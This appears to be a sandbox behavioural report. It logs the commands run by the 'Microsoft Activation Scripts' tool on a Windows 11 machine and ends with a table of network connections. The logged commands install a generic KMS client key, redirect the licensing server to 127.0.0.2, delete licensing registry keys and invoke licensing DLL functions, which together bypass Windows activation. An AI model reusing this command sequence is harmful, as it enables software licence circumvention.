reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Type

C:\Windows\System32\sc.exe

sc start KeyIso

C:\Windows\System32\sc.exe

sc query KeyIso

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DependOnService

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Description

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DisplayName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ErrorControl

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ImagePath

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ObjectName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Start

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Type

C:\Windows\System32\sc.exe

sc start Winmgmt

C:\Windows\System32\sc.exe

sc query Winmgmt

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DependOnService

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Description

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DisplayName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ErrorControl

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ImagePath

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ObjectName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Start

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Type

C:\Windows\System32\sc.exe

sc start ClipSVC

C:\Windows\System32\sc.exe

sc start sppsvc

C:\Windows\System32\sc.exe

sc start KeyIso

C:\Windows\System32\sc.exe

sc start Winmgmt

C:\Windows\System32\sc.exe

sc query ClipSVC

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\sc.exe

sc start ClipSVC

C:\Windows\System32\sc.exe

sc query sppsvc

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\sc.exe

sc start sppsvc

C:\Windows\System32\sc.exe

sc query KeyIso

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\sc.exe

sc start KeyIso

C:\Windows\System32\sc.exe

sc query Winmgmt

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\sc.exe

sc start Winmgmt

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinPE" /v InstRoot

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':wpatest\:.*';iex ($f[1])" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':wpatest\:.*';iex ($f[1])"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "10" "

C:\Windows\System32\find.exe

find /i "Error Found"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND LicenseDependsOn is NULL AND PartialProductKey IS NOT NULL) get LicenseFamily /VALUE" 2>nul

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND LicenseDependsOn is NULL AND PartialProductKey IS NOT NULL) get LicenseFamily /VALUE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "try { $null=([WMISEARCHER]'SELECT * FROM SoftwareLicensingService').Get().Version; exit 0 } catch { exit $_.Exception.InnerException.HResult }"

C:\Windows\System32\cmd.exe

cmd /c exit /b 0

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_ComputerSystem get CreationClassName /value

C:\Windows\System32\find.exe

find /i "computersystem"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "0" "

C:\Windows\System32\findstr.exe

findstr /i "0x800410 0x800440 0x80131501"

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedTSReArmed"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ClipSVC\Volatile\PersistedSystemState"

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe\PerfOptions"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm" 2>nul

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Plugins\Objects\msft:rm/algorithm/hwid/4.0" /f ba02fed39662 /d

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore 2>nul

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE" 2>nul

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "

C:\Windows\System32\find.exe

find /i "Ready"

C:\Windows\System32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "actionlist" /f

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$acl = (Get-Acl 'C:\Windows\System32\spp\store\2.0' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow FullControl') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$acl = (Get-Acl 'HKLM:\SYSTEM\WPA' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow QueryValues, EnumerateSubKeys, WriteKey') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$acl = (Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow SetValue') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$netServ = (New-Object Security.Principal.SecurityIdentifier('S-1-5-20')).Translate([Security.Principal.NTAccount]).Value; $aclString = Get-Acl 'Registry::HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies' | Format-List | Out-String; if (-not ($aclString.Contains($netServ + ' Allow FullControl') -or $aclString.Contains('NT SERVICE\sppsvc Allow FullControl')) -or ($aclString.Contains('Deny'))) {Exit 3}"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value 2>nul

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE" 2>nul

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "040fa323-92b1-4baf-97a2-5b67feaefddb 0724cb7d-3437-4cb7-93cb-830375d0079d 0ad2ac98-7bb9-4201-8d92-312299201369 1a9a717a-cf13-4ba5-83c3-0fe25fa868d5 221a02da-e2a1-4b75-864c-0a4410a33fdf 291ece0e-9c38-40ca-a9e1-32cc7ec19507 2936d1d2-913a-4542-b54e-ce5a602a2a38 2c293c26-a45a-4a2a-a350-c69a67097529 2de67392-b7a7-462a-b1ca-108dd189f588 2ffd8952-423e-4903-b993-72a1aa44cf82 30a42c86-b7a0-4a34-8c90-ff177cb2acb7 345a5db0-d94f-4e3b-a0c0-7c42f7bc3ebf 3502365a-f88a-4ba4-822a-5769d3073b65 377333b1-8b5d-48d6-9679-1225c872d37c 3df374ef-d444-4494-a5a1-4b0d9fd0e203 3f1afc82-f8ac-4f6c-8005-1d233e606eee 49cd895b-53b2-4dc4-a5f7-b18aa019ad37 4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c 4f3da0d2-271d-4508-ae81-626b60809a38 5d78c4e9-aeb3-4b40-8ac2-6a6005e0ad6d 60b3ec1b-9545-4921-821f-311b129dd6f6 613d217f-7f13-4268-9907-1662339531cd 62f0c100-9c53-4e02-b886-a3528ddfe7f6 6365275e-368d-46ca-a0ef-fc0404119333 721f9237-9341-4453-a661-09e8baa6cca5 73111121-5638-40f6-bc11-f1d7b0d64300 7a802526-4c94-4bd1-ba14-835a1aca2120 7cb546c0-c7d5-44d8-9a5c-69ecdd782b69 82bbc092-bc50-4e16-8e18-b74fc486aec3 8ab9bdd1-1f67-4997-82d9-8878520837d9 8b351c9c-f398-4515-9900-09df49427262 90da7373-1c51-430b-bf26-c97e9c5cdc31 92fb8726-92a8-4ffc-94ce-f82e07444653 95dca82f-385d-4d39-b85b-5c73fa285d6f a48938aa-62fa-4966-9d44-9f04da3f72f2 b0773a15-df3a-4312-9ad2-83d69648e356 b4bfe195-541e-4e64-ad23-6177f19e395e b68e61d2-68ca-4757-be45-0cc2f3e68eee bd3762d7-270d-4760-8fb3-d829ca45278a c86d5194-4840-4dae-9c1c-0301003a5ab0 ca7df2e3-5ea0-47b8-9ac1-b1be4d8edd69 d552befb-48cc-4327-8f39-47d2d94f987c d6eadb3b-5ca8-4a6b-986e-35b550756111 df96023b-dcd9-4be2-afa0-c6c871159ebe e0c42288-980c-4788-a014-c080d2e1926e e4db50ea-bda1-4566-b047-0ca50abc6f07 e558417a-5123-4f6f-91e7-385c1c7ca9d4 e7a950a2-e548-4f10-bf16-02ec848e0643 eb6d346f-1c60-4643-b960-40ec31596c45 ec868e65-fadf-4759-b23e-93fe37f2cc29 ef51e000-2659-4f25-8345-3de70a9cf4c4 f7af7d09-40e4-419c-a49b-eae366689ebd fa755fe6-6739-40b9-8d84-6d0ea3b6d1ab fe74f55b-0338-41d6-b267-4a201abe7285" "

C:\Windows\System32\find.exe

find /i "2de67392-b7a7-462a-b1ca-108dd189f588"

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="W269N-WFGWX-YVC9B-4J6C9-T83GX"

C:\Windows\System32\cmd.exe

cmd /c exit /b 0

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call RefreshLicenseStatus

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE" 2>nul

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE

C:\Windows\System32\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f

C:\Windows\System32\reg.exe

reg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServiceName /t REG_SZ /d "127.0.0.2"

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServicePort /t REG_SZ /d "1688"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\sc.exe

sc query sppsvc

C:\Windows\System32\find.exe

find /i "STOPPED"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "Start-Job { Restart-Service ClipSVC } | Wait-Job -Timeout 20 | Out-Null"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\Clipup.exe

"C:\Windows\system32\Clipup.exe" -o

C:\Windows\system32\Clipup.exe

"C:\Windows\system32\Clipup.exe" -o -ppl C:\Windows\SystemTemp\tem4A0E.tmp

C:\Windows\System32\ClipUp.exe

clipup -v -o

C:\Windows\System32\clipup.exe

clipup -v -o -ppl C:\Users\Admin\AppData\Local\Temp\tem4AE9.tmp

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "Windows 11 Pro" "

C:\Windows\System32\find.exe

find /i "Windows"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE" 2>nul

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powershell.exe "$([DateTime]::Now.addMinutes(6933338)).ToString('yyyy-MM-dd HH:mm:ss')" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$([DateTime]::Now.addMinutes(6933338)).ToString('yyyy-MM-dd HH:mm:ss')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':regdel\:.*';& ([ScriptBlock]::Create($f[1])) -protect"

C:\Windows\System32\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"

C:\Windows\System32\reg.exe

reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "State" /f

C:\Windows\System32\reg.exe

reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "SuppressRulesEngine" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null; $TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('SLpTriggerServiceWorker', 'sppc.dll', 22, 1, [Int32], @([UInt32], [IntPtr], [String], [UInt32]), 1, 3); [void]$TB.CreateType()::SLpTriggerServiceWorker(0, 0, 'reeval', 0)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl,,0

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\Baif oc -efjie.pptx" /ou ""

C:\Windows\system32\SystemSettingsAdminFlows.exe

"C:\Windows\system32\SystemSettingsAdminFlows.exe" RenamePC

C:\Windows\System32\PickerHost.exe

C:\Windows\System32\PickerHost.exe -Embedding

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\Baif oc -efjie.pptx" /ou ""

C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.144:443 www.bing.com tcp
GB 95.101.143.34:443 tcp
GB 92.123.128.164:443 www.bing.com tcp
GB 92.123.128.164:443 www.bing.com tcp
GB 92.123.128.164:443 www.bing.com tcp
GB 92.123.128.164:443 www.bing.com tcp
GB 92.123.128.164:443 www.bing.com tcp
GB 92.123.128.164:443 www.bing.com tcp
US 20.42.72.131:443 browser.pipe.aria.microsoft.com tcp
GB 92.123.128.191:443 www.bing.com tcp
CH 20.199.196.24:443 408c71c6b4182bc0e7b6dad6a1f85971.clo.footprintdns.com tcp
US 52.234.227.128:443 ebe333a53a8b08e1a295fe7a35ef249e.azr.footprintdns.com tcp
FR 152.199.21.118:443 static-ecst.licdn.com tcp
US 150.171.74.254:443 bx-ring.msedge.net tcp
US 13.107.246.65:443 fp-afd-nocache-ccp.azureedge.net tcp
US 172.202.65.254:443 arc-ring.msedge.net tcp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.149:443 www.bing.com tcp
US 20.141.12.34:443 fp-afd.azureedge.us tcp
US 20.141.12.34:443 fp-afd.azureedge.us tcp
US 13.107.219.254:443 t-ring-fallbacks1.msedge.net tcp
CH 20.203.193.248:443 zrh20prdapp01-canary-opaph.netmon.azure.com tcp
US 13.107.246.65:443 fp-afd-nocache-ccp.azureedge.net tcp
FR 52.98.163.34:443 894bc0c64677eddd0509476ce7bb433c.nrb.footprintdns.com tcp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
GB 2.18.63.31:443 metadata.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.152:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 144.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 31.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 152.117.19.2.in-addr.arpa udp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
GB 95.101.143.34:443 tcp
US 4.150.240.254:443 arm-ring.msedge.net tcp
US 20.141.12.34:443 fp-afd.azureedge.us tcp
US 52.108.9.254:443 wac-ring.msedge.net tcp
US 8.8.8.8:53 mcr-ring.msedge.net udp
US 150.171.69.254:443 mcr-ring.msedge.net tcp
US 8.8.8.8:53 254.69.171.150.in-addr.arpa udp
GB 92.123.128.180:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
GB 92.123.128.148:443 www.bing.com tcp
GB 92.123.128.148:443 www.bing.com tcp
GB 92.123.128.178:443 www.bing.com tcp
GB 92.123.128.178:443 www.bing.com tcp
GB 2.19.117.148:443 aefd.nelreports.net tcp
GB 92.123.128.178:443 www.bing.com tcp
US 13.107.21.200:443 bing.com tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 104.21.10.247:443 getgreenshot.org tcp
US 104.21.10.247:443 getgreenshot.org tcp
US 8.8.8.8:53 consent.cookiebot.com udp
GB 95.100.104.20:443 consent.cookiebot.com tcp
GB 23.218.75.88:443 consentcdn.cookiebot.com tcp
GB 23.218.75.88:443 consentcdn.cookiebot.com tcp
GB 172.217.169.66:443 googleads.g.doubleclick.net tcp
GB 172.217.16.232:443 ssl.google-analytics.com tcp
GB 172.217.16.232:443 ssl.google-analytics.com udp
US 8.8.8.8:53 20.104.100.95.in-addr.arpa udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 226.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 88.75.218.23.in-addr.arpa udp
US 8.8.8.8:53 66.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 232.16.217.172.in-addr.arpa udp
GB 216.58.204.78:443 fundingchoicesmessages.google.com tcp
GB 216.58.204.78:443 fundingchoicesmessages.google.com udp
GB 172.217.169.66:443 googleads.g.doubleclick.net udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
US 104.21.10.247:80 getgreenshot.org tcp
GB 142.250.187.196:443 www.google.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 95.101.143.34:443 tcp
IE 20.123.29.87:443 3ca286e5e5eb4aed42c415698015e279.azr.footprintdns.com tcp
US 150.171.69.254:443 mcr-ring.msedge.net tcp
US 150.171.74.254:443 bx-ring.msedge.net tcp
IE 20.123.29.87:443 3ca286e5e5eb4aed42c415698015e279.azr.footprintdns.com tcp
US 13.107.138.254:443 spo-ring.msedge.net tcp
US 104.21.10.247:80 getgreenshot.org tcp
US 104.21.10.247:80 getgreenshot.org tcp
US 104.21.10.247:443 getgreenshot.org tcp
US 192.0.77.2:443 i1.wp.com tcp
SE 192.229.221.25:443 www.paypalobjects.com tcp
SE 192.229.221.25:443 www.paypalobjects.com tcp
GB 142.250.187.226:443 googleads.g.doubleclick.net udp
GB 172.217.16.232:443 ssl.google-analytics.com udp
GB 172.217.16.232:443 ssl.google-analytics.com tcp
GB 216.58.204.78:443 fundingchoicesmessages.google.com udp
GB 216.58.204.78:443 fundingchoicesmessages.google.com tcp
GB 142.250.179.225:443 tpc.googlesyndication.com udp
GB 216.58.204.67:443 p4-gep5dc33nwvie-z3fpwuqpfem556nh-if-v6exp3-v4.metric.gstatic.com tcp
GB 142.250.179.225:443 tpc.googlesyndication.com tcp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 216.58.204.67:443 p4-gep5dc33nwvie-z3fpwuqpfem556nh-if-v6exp3-v4.metric.gstatic.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
JP 172.217.26.227:443 csi.gstatic.com tcp
US 152.199.19.161:443 fp-vs.azureedge.net tcp
US 150.171.64.254:443 ev2-ring.msedge.net tcp
FR 152.199.21.118:443 static-ecst.licdn.com tcp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.141:443 www.bing.com tcp
US 150.171.84.254:443 p-ring.msedge.net tcp
US 4.150.240.254:443 arm-ring.msedge.net tcp
US 8.8.8.8:53 ax-ring.msedge.net udp
